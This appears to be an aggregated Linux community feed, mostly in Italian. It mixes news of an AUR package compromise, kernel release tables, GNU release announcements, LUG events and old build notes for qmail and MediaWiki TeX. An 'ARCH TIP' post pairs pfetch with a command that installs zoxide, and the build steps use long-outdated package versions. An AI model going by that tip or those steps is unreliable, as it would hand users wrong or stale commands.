Hi Again.I tried to perform apt remove and again install direwolf but didn't noticed any fix.
Aurora OS: La Migliore Stazione di Sviluppo Linux?🤔🐋
Ecco un sistema che ti garantisca stabilità assoluta, aggiornamenti atomici e un ecosistema container-first. Esaminiamo tecnicamente la sua architettura, le prestazioni e la sua integrazione profonda con Podman e Flatpak, senza tralasciare l’aspetto dell’interfaccia KDE...
AUR: a fine giornata scoperti oltre 1500 pacchetti compromessi
#archlinux #linux #aur
Quella che era iniziata come una grave violazione circoscritta si è trasformata, nel giro di poche ore, in uno dei più vasti e preoccupanti incidenti di sicurezza nella storia di Arch Linux.
https://www.marcosbox.com/2026/06/13/aur-a-fin...
Quella che era iniziata come una grave violazione circoscritta si è trasformata, nel giro di poche ore, in uno dei più vasti e preoccupanti incidenti di sicurezza nella storia di Arch Linux. Nella giornata di ieri vi avevo segnalto della compromissione di più di 400 pacchetti presenti nel repository AUR (Arch User Repository). A fine […]
L'articolo AUR: a fine giornata scoperti oltre 1500 pacchetti compromessi proviene da Marco's Box.
In questa puntata di Radiolinux su http://www.radiostart.it/ ore 12,30
torniamo sulla distribuzione Q4OS utilissima per computer datati che possiamo utilizzare anche per fini aziendali. Si parla inoltre di Sovranita’ tecnologica, delle
lotte delle varie suite office nel mondo linux, di Euro Office, A.I e
legislatore am...
Chi si sta cagando addosso alzi la mano!
https://kerberos.archathome.eu/pacchetti-aur/
@linux @linux@diggita.com
#linux #arch #archBTW #aur #security
RefreshOS 3.0: la distribuzione GNU/Linux basata su Debian 13 con KDE Plasma 6
RefreshOS è una distribuzione GNU/Linux sviluppata e mantenuta da eXybit Technologies, pensata per chi desidera la stabilità di Debian unita a un ambiente desktop moderno e funzionale. Nata come progetto indipendente, si propone come una soluzione pronta a...
È notizia di queste ore di un attacco malware all AUR, se usate arch o derivate informatevi in merito e controllate di non essere infetti
@linux
Linux ti offre un controllo estremamente dettagliato sul funzionamento del tuo sistema: puoi automatizzare attività ripetitive, programmare operazioni in orari specifici e persino decidere quali processi devono avere la priorità nell’utilizzo della CPU.
Ecco alcuni dei comandi #Linux più utili per pianificare attività e gestir...
Il giorno in cui un mirror francese ha deciso di andare in pausa… :archlinux:
https://kerberos.archathome.eu/pacnew/
@linux @linux@diggita.com
#linux
#arch
#pacman
@linux
Ultimo post della mia avventura per far approvare Fedora Linux all’interno della mia azienda.
I grandi capi mi hanno risposto (accorciato) cosi:
-Non è abbastanza integrato (ci sta)
-Windows è lento apposta perchè molto sicuro (non sono tanto convinto)
-La sicurezza andrebbe compromessa perchè è...
@linux
Followup della scelta della distro, forse sto facendo progressi nel portare linux nella mia azienda.
I miei superiori però mi chiedono un motivo o una serie di motivi per cui necessito di tale strumento 🥲
Meglio ancora se qualcosa che “posso fare solo con linux”…
Sinceramente non mi viene in mente...
Dal Port Knocking allo Single Packet Authorization
Quando bussare non basta più
https://blog.marvinpascale.it/posts/2026/fwknopd/
#opensource #linux #sicurezza #firewall #unolinux @linux @sicurezza
...https://www.phoronix.com/news/Vulkan-Ape-Driver
Nuono driver vulan all’orizzonte.
@linux
...Nuovo appuntamento con Linux e l’open source, venerdì 12 giugno dalle ore 21 presso la sede di Solero, passate a trovarci.
#linux #opensource #pc #software #lug
@ItaLinuxSociety @linux@diggita.com
@linux @opensource
Forse potrei eventualmente star facendo progressi con Linux nel mio business enviromentcx…
Dato che parliamo di dominio Micorsoft, meglio Arch o Fedora? so che Fedora ha già integrazioni “pronte all’uso”?
Però preferirei Arch 🤔
consigli? 🫠
@linux
...Vuoi bloccare pubblicità e tracker su tutti i dispositivi della rete con una soluzione self-hosted?
Ho pubblicato una guida pratica su AdGuard Home in locale, con installazione e configurazione di base.
🔗 https://www.risposteinformatiche.it/adguard-home-locale-guida-pratica/
@linux @opensource
#AdGuardHome #D...
Qual è il motivo che dovrebbe spingere qualcuno ad usare #Linux ?
Voi avreste facilmente una risposta?
In un mondo dove si è sempre catalogati e dove anche i sistemi operativi hanno ormai ritagliato il proprio spazio in una nicchia, ho cercato di trovare la mia personalissima risposta al quesito, cercando di essere il più ...
Linus Torvalds annuncia che il kernel Linux 7.1 sta riprendendo la sua normalità dopo settimane di tensioni causate dall’uso eccessivo dell’intelligenza artificiale nei contributi. https://www.punto-informatico.it/kernel-linux-7-1-si-stabilizza-dopo-caos-patch-ai/ @linux #unolinux Il rilascio del kernel Linux 7.1 segna la conclusione di ...
Pubblicata la puntata di Radiolinux odierna nella versione video ai seguenti indirizzi
https://youtu.be/ZOTTDmGEMgQ
https://peertube.uno/w/a3d4jQ9pjQWwtCxdoyU8LP
@linux
...Ubuntu Unity 26.04: La Nostalgia Diventa REALTÀ! 🚀💻⚙️
Ami l’estetica Unity di Ubuntu ma ti spaventano i rischi di hardware obsoleto e la perdita di controllo sulla tua privacy? C’è un modo per ottenere l’Ubuntu Unity perfetto nel 2026, grazie alla versione 26.04 (No LTS)! 🚀💻
https://youtu.be/utVxUO...
In questa puntata di Radiolinux ore 12,40 su https://www.radiostart.it/ oltre a parlare delle ultime
integrazioni di Intelligenza Artificiale e linux esaminiamo
le distribuzioni RhinoLinux e MxLinux che utilizzano in maniera
diversa Xfce desktop
Ma ci sono anche sovranita’ tecnologica, multe a Temu, identificazio...
🐀Gnawbit è un figlio difficile. Non è come Ratkit.
Ratkit è stato: scoperta, imperfezione, studio e novità.
Gnawbit è: razionalità, scelte, necessità di fare meglio e decine di tentativi falliti di migliorare un prodotto già sufficientemente buono.
Sebbene manchino 6 mesi all’uscita, la pressione si se...
Brave Origin: il browser minimalista a pagamento di Brave (ma gratuito per Linux)
#bravebrowser #brave
Brave Software ha annunciato il rilascio di Brave Origin, una nuova versione a pagamento di Brave browser pensata per gli utenti che non hanno bisogno di tutte le funzionalità che supportano Brave come azienda, ma desiderano comu...
🚀 ARCH TIP #005
Info minimaliste sul sistema?
Installa e aggiungi pfetch sul tuo ~/.bashrc
Installazione:
sudo pacman -S zoxide
Utilizzo:
pfetch
Tu usi pfetch, fastfetch o altro??
👇 Scrivilo nei commenti.
💾 Salva il post per ritrovarlo quando ti servirà.
🐧 Segui...
🐧 Linux non è solo un sistema operativo: è l’infrastruttura di base che fa funzionare Internet.
Imparare #Linux significa acquisire competenze concrete e liberarsi dalla dipendenza dalle piattaforme proprietarie.
Che tu voglia diventare sistemista o semplicemente riprendere il controllo del PC, questa guida ti porta da...
Il nuovo sito appena andato online ma ci siamo già affezionati a questa estetica un po’ anni ‘90, fatta di marquee che scorrono, font a pixel e contatore delle visite. Ma mentre lo costruivamo ci è venuta una curiosità: quanti siti ha avuto il LuccaLUG in tutti questi anni?
Tanti. Tantissimi. Uno per ogni moda del web che è passata di qui dal 2007 a oggi. Così abbiamo fa...
Sicily&Coding 2026 e' un evento pubblico e gratuito che si terrà Venerdì 29 maggio 2026 alle Officine Bellotti di Palermo, dalle ore 10:00 alle 16:30.
Cos'è Sicily&Coding[Versione italiana di sotto] Die Linux User Group Bozen startet mit neuem Vorstand in eine neue Etappe Am Samstag, den 16. Mai 2026, hat die Linux User Group Bolzano-Bozen-Bulsan im SPAZIO77 in Bozen ihre ordentliche Vollversammlung abgehalten – und dabei nicht nur Bilanz gezogen, sondern auch die Weichen für die Zukunft gestellt. Nach dem Tätigkeitsbericht […]
Continue reading.....
Leggi tutto
...Leggi tutto
...Il 28 Aprile si è tenuto un incontro organizzato dal PLUG (Prato Linux User Group), con la partecipazione del GOLEM (Gruppo Operativo Linux Empoli) e il FLUG (Firenze Linux User Group).
A guidare la serata sono state Chiara Pasquali - business coach e formatrice su parità di genere - e Alice Nencini - marketing consultant con fo...
L’attività è rivolta a ragazze e ragazzi dai 10 anni in su che vogliano affacciarsi al mondo della robotica e domotica amatoriale attraverso la programmazione di Arduino. Sono previsti 2 corsi con incontri settimanali (martedì o mercoledì), dalle 17 alle 19:
MARTEDI'
23, 30 GIUGNO
7, 14, 21, 28 LUGLIO
4, 25 AGOSTO
1, 8, 15 SETT...
Nominate Now: SFS & European SFS Awards 2026 SFS Award Nomination 2026 DE Die LUGBZ ruft zur Nominierung für den SFS Award 2026 auf! Mit diesem Preis zeichnen wir Menschen aus, die die Freie-Software-Community in Südtirol maßgeblich prägen – sei es durch Entwicklung, Engagement oder Community-Arbeit. Kennst du jemanden, der lokal einen echten Unterschied macht? […]
Continue rea...
Università degli studi di Palermo
Sabato 9 Maggio 2026
Diretta ore 09:30 10:30 11:40 Pomeriggio 15:00 16:15
Teatro Gregotti - Viale delle Scienze
09:00 Vincenzo Virgilio Hack the Kernel – 7.x 10:00 Francesco Passantino Vibe Coding, the final countdown? 11:00 Fabrizio Soppelsa Anthropic Mythos: L’AI entra nel read-team, cosa fare? 12...Freie Software, Reparaturkultur und digitale Selbstbestimmung Am 25. und 26. April 2026 war eine vierköpfige Delegation der Linux User Group Bozen-Bolzano-Bulsan auf Einladung der Linux User Group Pordenone-Friuli Venezia Giulia (PNLug) auf der Fiera di Pordenone vertreten. Mit dabei waren Präsident Anton Auer, Flavia Basili, Thomas Vigato und Christian Troger. Unser Stand in der Linux [̷...
Leggi tutto
...Sei socio/a LUGBZ !! (Se no, ma sei “utente linux”, potresti diventarlo) Du bist Mitglied unseres Vereins LUGBZ !! (Du könntest es auch werden, wenn du Linux lernen/nutzen möchtest) Ti ricordi il l’annuncio ? — Erinnerst du dich an den Hinweis ? Save the date – 16.5. Sabato pomeriggio-sera – Samstag nachmittag Ecco, adesso sei […]
Continue reading...
Il POuL è orgoglioso di presentare anche quest’anno la Conferenza Sicurezza e Privacy, giunta alla sua nona edizione!
Info: https://talk.lugbz.org/t/digital-independence-sun-day-every-month-in-via-caproni-9-salarete-netz-raum/9919 Background: https://di.day
Continue reading...
The post Ostersonntag in BZ – Domenica di Pasqua a BZ appeared first on LUGBZ.
...A tutti i soci, a tutti i candidati soci, del Gruppo Utenti GNU/Linux Vicenza (LugVI) Convocazione assemblea straordinaria Come stabilito nell’ultima riunione del direttivo, viene convocata l’assemblea straordinaria dell’associazione alle ore 2 in prima convocazione e alle 16 in seconda
L'articolo proviene da LugVI.
...ARDUINO DAY 2026
innovazione, formazione e cultura open source a Barletta
La Puglia Software Open Source – APS, associazione di promozione sociale attiva sul territorio dal 2012 e riorganizzata nel 2019 come Ente del Terzo Settore, annuncia la propria partecipazione all’Arduino Day 2026, l’evento mondiale dedicato alla creatività elettronica e alla cultura dell’open hardware....
(Versione italiana vedi sotto) Ein Abend voller Austausch und Gemeinschaft Am gestrigen 19. März 2026 haben sich die Mitglieder der LUGBZ erneut im Biergarten Kaltern getroffen. Bereits im letzten Jahr hatte ein solches Treffen stattgefunden, und auch heuer war es wieder ein gelungenes Event. Neben dem geselligen Beisammensein wurden diesmal zusätzlich die bestellten T-Shirts […]...
Stai pensando di passare a trovarci ma non sai bene cosa aspettarti? Questa guida è per te.
Non devi essere un espertoDavvero. Questa è la cosa più importante: non serve sapere nulla di Linux per venire ai nostri incontri. Tra di noi c’è chi usa Linux da vent’anni e chi ha appena scoperto che esiste qualcosa oltre Windows. Siamo un gruppo eterogeneo e ci piace così.
...Siamo felici di annunciare il lancio del nuovo sito del Luccalug!
Abbiamo voluto creare qualcosa di diverso dal solito: un sito che richiama lo spirito del vecchio web, quando internet era un posto strano, personale e pieno di creatività.
Cosa troverete Blog: news, eventi, tutorial e racconti dalle nostre attività Archivio: tutti i documenti ufficiali dell’associazione Infor...Leggi tutto
...Comprehensive measures adopted by the European Commission aim to reduce dependency on non-EU countries.
| Version: | next-20260612 (linux-next) |
|---|---|
| Released: | 2026-06-12 |
Having recently moved house, Gary wonders how to reconfigure his homelab and network setup. Plus Shane is fed up with GitHub’s outages and formulates a plan to move away… somewhere…
Support us on patreon and get an ad-free RSS feed with early episodes sometimes
Subscribe to the RSS feed.
Se utilizzate Arch Linux o una delle sue celebri derivate (come EndeavourOS o CachyOS) e attingete regolarmente ad AUR (Arch User Repository), questo è il momento di prestare la massima attenzione. Nelle ultime 24 ore è emersa una massiccia campagna di attacco coordinata che ha visto la compromissione di oltre 400 pacchetti all’interno del noto […]
L'articolo AUR sotto attacco: scoperti oltre 400 pacchetti compromessi da un malware proviene da Marco's Box.
While this thread is going, I'll chime in that it'd be nice to have a feature to speed up and slow down the vertical time display.
I do not believe this is how WFM mode was supposed to be used.As well, I'd like to see the WFM mode be adjustable in bandwidth. I am monitoring some LoRa signals (a form of FM). I don't listen to broadcast FM radio, instead I use the WFM mode to "hear" the LoRa frames and symbols
Buone notizie in arrivo per gli scontenti dell’interfaccia grafica di LibreOffice. A partire dal LibreOffice 26.8, il cui rilascio è previsto per il prossimo mese di agosto, sarà possibile personalizzare dando un tocco di colore all’interfaccia a schede (la Notebookbar). L’anteprima ci arriva dal profilo Mastodon del Design Team di Libreoffice. Come potete vedere è […]
L'articolo LibreOffice si colora proviene da Marco's Box.
People were locked out of their password managers to stop a brute force attack, Coreutils come to Windows, a FreeBSD PR effort backfires, and the best simple consumer WiFi gear.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Why ZFS Is the Ideal Filesystem for Multi-User/Department Media Production
Webinar: June 30th @ 11am EDT: FreeBSD After Hours AMA
News/discussion
Password manager Dashlane suspends customer accounts amid brute-force attacks
Microsoft Announces Coreutils For Windows: Derived From Rust Coreutils
FreeBSD Foundation Executive Director Tries Daily Driving FreeBSD On Laptop
Free consulting
We were asked about the best simple consumer WiFi gear.
| Version: | next-20260611 (linux-next) |
|---|---|
| Released: | 2026-06-11 |
| Version: | next-20260610 (linux-next) |
|---|---|
| Released: | 2026-06-10 |
Within growing security and skills gaps, AI has been found to be a positive driving force behind tech hiring trends in Europe.
1) If it does not work for you, reload OpenWebRX page while holding the SHIFT key.
2) If it does not work for you, check "Settings | Feature report" page to see what you are missing.
3) If it does not work for you, wait for a day or two, maybe it starts working or you figure it out.
4) If it does not work for you, create a separate forum thread and explain your problem there. Attach the logs, obtained with "sudo journalctl -u openwebrx". Do not paste the entire log into the message, attach it as a file instead.
| Version: | 7.0.12 (stable) |
|---|---|
| Released: | 2026-06-09 |
| Source: | linux-7.0.12.tar.xz |
| PGP Signature: | linux-7.0.12.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-7.0.12 |
| Version: | 6.18.35 (longterm) |
|---|---|
| Released: | 2026-06-09 |
| Source: | linux-6.18.35.tar.xz |
| PGP Signature: | linux-6.18.35.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-6.18.35 |
| Version: | 6.12.93 (longterm) |
|---|---|
| Released: | 2026-06-09 |
| Source: | linux-6.12.93.tar.xz |
| PGP Signature: | linux-6.12.93.tar.sign |
| Patch: | full (incremental) |
| ChangeLog: | ChangeLog-6.12.93 |
A new Firefox release confuses Félim, Plex makes no sense in a world where Jellyfin exists, Will considers paying for the Kagi search engine, and another small Android tablet for your wall. Plus what we learned at the recent Ubuntu Summit.
News/discussion
Firefox 151.0, See All New Features, Updates and Fixes
New Lifetime Plex Pass Pricing
Ubuntu Summit
A new open source portal seeks to coordinate and scale open source efforts across the United Nations system.
| Version: | 7.1-rc7 (mainline) |
|---|---|
| Released: | 2026-06-07 |
| Source: | linux-7.1-rc7.tar.gz |
| Patch: | full (incremental) |
GNUtrition 0.33 is now released. This marks the first release of GNUtrition since 2012, approximately 14 years ago!
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release is a complete rewrite of GNUtrition in C rather than Python 2 with a new GTK 3 interface replacing the old GTK 2 one. The Nutrient Database of Standard Reference, which stopped getting updated in 2018, was replaced with the USDA Food and Nutrition Database for Dietary Studies. With help from some test volunteers, the build and installation process was better streamlined to resolve critical issues and difficulties so that GNUtrition can be a better program overall.
Considering the time between releases, GNUtrition currently is not available on OS package repositories (as far as I am aware). If you package software for your operating system's package manager, it would be very helpful if you could start packaging GNUtrition so that it may be even more easily used by people on said systems. If you don't, you may still request to those who do to start including GNUtrition.
Thank you to everyone who tested/used GNUtrition 0.33's release candidates and provided meaningful feedback on its functionality, design, and so on. I would also like to especially thank Jason Self for providing us with the C rewrite in the first place.
More information about GNUtrition may be found on its home page at http://gnu.org/so ... tware/gnutrition/. This release can be obtained from the ftp.gnu.org server at one of the following:
ftp://ftp.gnu.o ... gnu/gnutrition/
http://ftp.gnu.or ... g/gnu/gnutrition/
https://ftp.gnu.o ... g/gnu/gnutrition/
The FTP mirror list is available at https://gnu.or ... order/ftp.html, and https://ftpmirror ... u.org/gnutrition/ will automatically redirect you to a nearby mirror.
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Happy hacking and calorie counting!!
Brave Software ha annunciato il rilascio di Brave Origin, una nuova versione a pagamento di Brave browser pensata per gli utenti che non hanno bisogno di tutte le funzionalità che supportano Brave come azienda, ma desiderano comunque la privacy che Brave offre.
L'articolo Brave Origin: il browser minimalista a pagamento di Brave (ma gratuito per Linux) proviene da Marco's Box.
Version 5.5 of GNU direvent is available for downloads. New in this version:
See the NEWS file for more details.
We revisit the topic of the dire situation with hardware prices, this time with a focus on getting the most out of machines with limited resources.
Support us on Patreon and get an ad-free RSS feed with some early episodes
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Microsoft threatens a security researcher for disclosing vulnerabilities publicly, bricks old versions of Office, and announces their version of OpenClaw. Plus keeping up with the latest technology.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Which ZFS Storage Metrics Matter for Database Performance
Webinar: June 25th @ 11am EDT: Understanding AnyRAID with Jon from HexOS
News/discussion
Microsoft under fire for threatening security researcher with criminal investigation
The researcher is a former MS employee says Krebs
Microsoft reaches for olive branch after public dustup with 0-day researcher
Microsoft is intentionally bricking all Office for Mac 2019/2021 installations
Introducing Microsoft Scout: Your always-on personal agent
Free consulting
We were asked about keeping up with the latest technology.
Libtoolers!
The Libtool Team is pleased to announce the release of libtool 2.6.1, a beta release.
GNU Libtool hides the complexity of using shared libraries behind a
consistent, portable interface. GNU Libtool ships with GNU libltdl, which
hides the complexity of loading dynamic runtime libraries (modules)
behind a consistent, portable interface.
There have been 34 commits by 14 people in the 37 weeks since 2.6.0.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Alexandre Janniaux (4)
Alexey Samsonov (1)
Anthony Mallet (1)
Arnold (1)
Dima Pasechnik (1)
Frederic Berat (1)
Ileana Dumitrescu (15)
KO Myung-Hun (4)
Kirill Makurin (1)
Mintsuki (1)
Nicolas Boulenguez (1)
Olly Betts (1)
Patrice Dumas (1)
Richard J. Mathar (1)
Ileana
[on behalf of the libtool maintainers]
==================================================================
Here is the GNU libtool home page:
https://gnu. ... g/s/libtool/
Here are the compressed sources:
https://alpha.gnu ... tool-2.6.1.tar.gz (2.1MB)
https://alpha.gnu ... tool-2.6.1.tar.xz (1.1MB)
Here are the GPG detached signatures:
https://alpha.gnu ... -2.6.1.tar.gz.sig
https://alpha.gnu ... -2.6.1.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: libtool-2.6.1.tar.gz
SHA256 sum: 52264ab2fca9464dea9f6a0355d39e49b18f40468b9b6dbc3d151a0dba307a4b
SHA3-256 sum: 59826fb74043179c38a393448b92dfcdfbe9046fd3b23a7079665984f22d6688
File: libtool-2.6.1.tar.xz
SHA256 sum: 3fb21f1e99fcdd8565c9b00fb1371db457b82a0da7cba273e1617c954b0ad1ee
SHA3-256 sum: 614bc3ed43293be989ec3305dae42fc4e81234429477490734a40f6d3316560b
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify libtool-2.6.1.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2021-09-23 [SC]
FA26 CA78 4BE1 8892 7F22 B99F 6570 EA01 146F 7354
uid Ileana Dumitrescu <ileanadumitrescu95@gmail.com>
uid Ileana Dumitrescu <ileanadumi95@protonmail.com>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key ileanadumitrescu95@gmail.com
gpg --recv-keys 6570EA01146F7354
wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify libtool-2.6.1.tar.gz.sig
This release is based on the libtool git repository, available as
git clone https://https.git ... g/git/libtool.git
with commit 79de7bb71bc0a1167f4c4ae8bd897976a0ff2b51 tagged as v2.6.1.
For a summary of changes and contributors, see:
https://gitweb.gi ... shortlog;h=v2.6.1
or run this command from a git-cloned libtool directory:
git shortlog v2.6.0..v2.6.1
This release was bootstrapped with the following tools:
Autoconf 2.73
Automake 1.18.1
Gnulib 2026-05-12 722f67e9716bf914c18d468336c1f4f9e5cce915
NEWS
** New features:
- Pass 'resource-dir=*' flag for Clang.
- Recognise explicit shared library arguments when linking dependency
libraries to a shared library, like exists when linking a program.
- Support OpenMP with macOS clang by processing '-Xpreprocessor
-fopenmp' as one token.
** Bug fixes:
- Store cygpath file path conversions correctly for MSYS2 and MSVC.
- Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.
- Separate Objective C and C++ cache check for proper tagging support.
- Fix in darwin to support values with spaces.
- Limit the length of DLL name to 8.3 correctly to avoid corrupting a
generated DLL on OS/2.
- Remove unused variable on OS/2, which could cause issues with static
library generation if defined.
- Recognise more static linking options for Clang.
- Fix emscripten CXX postdeps using non-PIC sysroot.
- Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.
- Avoid overlinking of dependency libraries on ELF systems.
- Ensure old libraries are not archived.
** Changes in supported systems or compilers:
- Add support for SlimCC compiler.
- Add support for *-ironclad-gnu.
Enjoy!
KDE Linux developers have dropped the Arch User Repository from the build pipeline due to security concerns; other distributions should consider doing the same.
Il Parlamento Europeo sostituirà Google come il motore di ricerca predefinito sui suoi computer con Microsoft Edge e Mozilla Firefox in favore di Qwant.
L'articolo Il Parlamento Europeo sceglie Qwant al posto di Google proviene da Marco's Box.
Quotando la definizione di D. J. Bernstein
qmail è un mail transfer agent semplice, sicuro ed affidabile. è stato progettato per dei server UNIX connessi alla rete internet
E' possibile reperire una introduzione più che comprensibile su come funziona un mail server in questa pagina. Anche la "qmail newbie's guide to relaying" di Chris Johnson (copia locale... è destino che tutto quello che riguarda qmail vada piano piano sparendo) è molto chiara e la sua lettura è fondamentale all'inizio.
Lo scopo di questa piccola guida NON è insegnare come funziona un server di posta, anche se alla fine si spera che uno che l'abbia seguita riesca ad avere un server funzionante. Questi appunti servono principalmente a ricordare i passi principali da seguire per avere una installazione veloce di qmail e di alcuni software correlati. Ho deciso di scriverla a causa della mancanza di ogni aggiornamento della documentazione riguardante le "distribuzioni" di qmail che mi erano familiari, nella speranza che ciò possa essere di aiuto anche a qualcun altro. Ovviamente il divertimento è stato una componente decisiva.
Pertanto, per conoscere in dettaglio come funziona un mail server, sei invitato a leggere con cura almeno i riferimenti che menzionerò in ogni pagina.
In secondo luogo, NON sono io il responsabile di quello che fai con il tuo server ;-). Usa la mia guida a tuo rischio.
Infine, i commenti, le critiche e i suggerimenti sono sempre benvenuti! :-)
Questa guida è stata scritta senza una particolare distribuzione Linux in mente. L'ho testata su due miei server di posta virtuali basati su Slackware, sia a 64 che a 32 bit, e diverse persone là fuori confermano che essa funziona nelle altre distribuzioni Linux più comuni. La compilazione dei miei pacchetti è stata testata anche su piattaforme FreeBSD, OpenBSD, NetBSD.
Se vale la definizione data da Bernstein probabilmente lo è. Tuttavia, a mio modo di vedere, un toaster dovrebbe essere una cosa alla Bill Shupp o alla qmailtoaster, che viene rilasciata insieme a tutti i pacchetti necessari, diversamente da qui. Poichè preferisco lasciare che il visitatore controlli da sè l'esistenza delle ultime versioni dei vari software, direi che questa "cosa" non dovrebbe essere classificata come un toaster. Piuttosto la chiamerei semplicemente "Roberto's qmail notes". Per la verità, sto inserendo qui un paragrafo sul toaster giusto per soddisfare i motori di ricerca, dato che molta gente arriva qui cercando un toaster per qmail.. :-) e ora che ho scritto la parola toaster 5 o 6 volte possiamo veramente iniziare... :-))
Questi appunti sono stati scritti in inglese e poi tradotti in italiano alla velocità della luce. Si vede, vero? Rileggendo ora, trovo degli strafalcioni e delle traduzioni letterali alla "Google translate"!. Me ne scuso, ma non ho sempre il tempo di fare le cose nel modo migliore..
Roberto's qmail notes is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
A test release of GNUtrition, 0.33.0rc5, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release fixes bugs from 0.33.0rc1-rc4, removes inaccurate algorithm constants, removes additional unnecessary dependencies, improves reliability/usability on non-GNU systems, among other general improvements and bug fixes. Version 0.33.0 (the first ftp.gnu.org release of GNUtrition since 2012) is expected to be released by June 5th. Any and all testing for the upcoming release will be greatly appreciated. Please use the bug-gnutrition and help-gnutrition mailing lists for your bug reports and/or other questions.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Carl Richell, il CEO di System76, ha postato su X una anteprima dell'effetto di COSMIC Frosted Glass, un nuovo effetto per COSMIC Desktop che introduce una trasparenza che ricorda per un certo verso l'effetto Aero introdotto con Windows Vista.
L'articolo COSMIC Frosted Glass riporta in auge Windows Aero proviene da Marco's Box.
Clement Lefebvre, patron di Linux Mint, nel suo consueto post mensile, ha annunciato alcune interessanti novità sullo sviluppo di Cinnamon e di Nemo, il file manager della distro.
L'articolo Linux Mint: Nemo diventa più veloce e arriva una nuova app per gli screenshots proviene da Marco's Box.
Il browser Vivaldi compie un passo importante con il rilascio della versione 8.0 desktop, definita dagli sviluppatori come il più grande redesign mai realizzato nella storia del progetto. L’aggiornamento introduce una nuova interfaccia chiamata “Unified”, layout predefiniti per diversi stili di utilizzo e numerose ottimizzazioni dedicate a produttività, personalizzazione e performance. Secondo il CEO e […]
L'articolo Vivaldi 8.0 rivoluziona il browser desktop: nuovo design e layout intelligenti proviene da Marco's Box.
Mozilla ha annunciato il rilascio della versione 151.0 del browser Firefox, la quale introduce una serie di aggiornamenti significativi riguardanti l'interfaccia utente, i meccanismi di tutela della privacy e svariate ottimizzazioni prestazionali, con un occhio di riguardo a macOS.
L'articolo Firefox 151.0: Aggiornamenti relativi alla privacy, all’interfaccia utente e miglioramenti per macOS proviene da Marco's Box.
Nuova puntata del podcast di Marco’s Box, questa volta dedicata a commentare le principali notizie dal mondo di linux e del software libero e open source. Trovate la puntata su Spotity, Google Podcasts, Anchor, Apple Podcast, Castbox, TuneIn, Amazon Music, Amazon Alexa e YouTube. In alternativa, per ascoltarla sul vostro player preferito, potete aggiungere il […]
L'articolo Il podcast di Marco’s Box #218 – Kernel Linux sotto attacco proviene da Marco's Box.
Analisi della vulnerabilità Fragnesia: come un bug nel sottosistema ESP-in-TCP permette la scrittura arbitraria nella page cache di Linux per ottenere i privilegi di root.
L'articolo Fragnesia: la nuova vulnerabilità Linux che colpisce la Page Cache proviene da Marco's Box.
o Support new "altbridging" workaround in ipmi-sensors.
o Fix exploitable buffer overflows in the following ipmi-oem
commands:
- ipmi-oem dell get-active-directory-config
- ipmi-oem fujitsu get-sel-entry-long-text
https://ftp.gnu.o ... pmi-1.6.18.tar.gz
Mediawiki offre la possibilità di inserire formule Tex nelle nostre pagine creando dinamicamente immagini PNG per noi..
Questa pagina vuole richiamare i pacchetti e i principali passi da seguire per far funzionare Tex con MediaWiki in una macchina Slackware. Alla fine presenterò alcune problematiche nell'installzione.
Ghostscript è già incluso in Slackware (ap/ghostscript e ap/ghostscript-fonts-std) ma se siamo in un server minimale potresti avere bisogno di installarlo.
Questa libreria la troviamo all'interno del pacchetto x/fontconfig. E' richesta da ImageMagick.
Accedi
wget http://www.imagemagick.org/download/ImageMagick-6.7.6-5.tar.bz2
tar xvfj ImageMagick-6.7.6-5.tar.bz2
cd ImageMagick-6.7.6-5
chown -R root:root .
./configure \
--without-x \
--with-png \
--with-freetype \
--with-dps \
--with-gslib
make
make install
ldconfig
Provare a digitare, dalla linea di comando
/usr/local/bin/convert logo: logo.gif
Se viene generato il file PNG tutto funziona come si deve.
wget http://caml.inria.fr/pub/distrib/ocaml-3.12/ocaml-3.12.0.tar.bz2 tar xjf ocaml-3.12.0.tar.bz2 cd ocaml-3.12.0 chown -R root:root . ./configure make make install
Download: http://sourceforge.net/projects/dvipng/
Prerequisiti:
PATH=$PATH:/usr/share/texmf/bin/ export PATH
Ricordare di salvare ciò anche nel profile.
Per evitare problemi nel link di kpathsea configurare come segue
./configure LDFLAGS='-L/usr/share/texmf/lib/' CPPFLAGS='-I/usr/share/texmf/include/' make make install
Senza AMS* alcune formule saranno rese correttamente mentre altre no. Il pacchetto tetex di Slackware contiene già AMS, comunque, nel caso non ce l'avessi:
cd /usr/share/texmf wget ftp://ftp.ams.org/pub/tex/amslatex.zip wget ftp://ftp.ams.org/pub/tex/amsrefs/amsrefs.zip unzip amslatex.zip unzip amsrefs.zip
